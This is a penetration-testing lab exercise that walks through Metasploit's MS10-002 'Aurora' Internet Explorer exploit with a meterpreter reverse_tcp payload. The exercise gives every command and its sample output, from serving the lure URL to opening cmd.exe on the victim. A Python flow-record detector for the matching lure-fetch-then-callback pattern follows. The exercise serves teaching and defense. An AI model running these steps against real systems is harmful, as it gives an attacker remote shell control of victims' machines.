In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:
1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3
2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole
3. You are now going to set up Metasploit to use the Aurora exploit, made famous in December 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora
4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address
5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address
7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit
Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL that is output here
[*] Server started.
msf exploit (ms10_002_aurora) >
8. Leave this shell open - you will return to it shortly
9. Log into your Victim Windows system
10. Open Internet Explorer
11. Paste the URL from step #7 into the address bar and hit ENTER
12. Switch back to your BackTrack system
You should see the following output:
[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back
13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the session number shown in the output from step #12)
[*] Starting interaction with 1…
meterpreter >
14. Open a Windows command shell through the Meterpreter shell (only type what’s in bold):
meterpreter > execute -f cmd.exe -i -H
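From the defender's side, the exercise output above shows a recognisable two-step network pattern: the victim fetches the lure page from the attacker's server on TCP/8080, then calls back to the same server on TCP/4444 (the Metasploit defaults printed in step 7 and step 12). The following is an added example, not part of the original exercise, that flags that sequence in flow records; the record format, the sample flows and the 60-second window are constructed assumptions.

```python
"""Flag a lure fetch (TCP/8080) followed by a callback (TCP/4444)
from the same internal host to the same external server.

Ports are the defaults shown in the exercise output; a real handler
can listen anywhere, so treat the ports as tunable parameters."""
from datetime import datetime, timedelta

# Constructed flow records: (timestamp, src_ip, dst_ip, dst_port).
SAMPLE_FLOWS = [
    ("2010-01-20 10:00:01", "10.0.0.5", "192.0.2.10", 8080),   # lure page fetch
    ("2010-01-20 10:00:04", "10.0.0.5", "192.0.2.10", 4444),   # reverse_tcp callback
    ("2010-01-20 10:05:00", "10.0.0.7", "192.0.2.10", 8080),   # fetch with no callback
    ("2010-01-20 10:30:00", "10.0.0.9", "198.51.100.3", 4444), # callback with no fetch
]

LURE_PORT = 8080      # web server port from "Using URL: http://...:8080/"
HANDLER_PORT = 4444   # "Started reverse handler on ...:4444"
WINDOW = timedelta(seconds=60)  # assumed max gap between fetch and callback


def find_lure_then_callback(flows, lure_port=LURE_PORT,
                            handler_port=HANDLER_PORT, window=WINDOW):
    """Return (src_ip, server_ip) pairs where src fetched from
    server:lure_port and then connected to server:handler_port
    within `window`. Flows are sorted by time first."""
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, port)
        for ts, src, dst, port in flows
    )
    last_lure = {}  # (src, dst) -> time of most recent lure fetch
    hits = []
    for ts, src, dst, port in parsed:
        key = (src, dst)
        if port == lure_port:
            last_lure[key] = ts
        elif port == handler_port and key in last_lure:
            if ts - last_lure[key] <= window:
                hits.append(key)
    return hits


if __name__ == "__main__":
    for src, server in find_lure_then_callback(SAMPLE_FLOWS):
        print(f"possible browser exploit + callback: {src} -> {server}")
```

Only the host that performed both steps against the same server is reported; the lone 8080 fetch and the lone 4444 connection are left alone to keep false positives down.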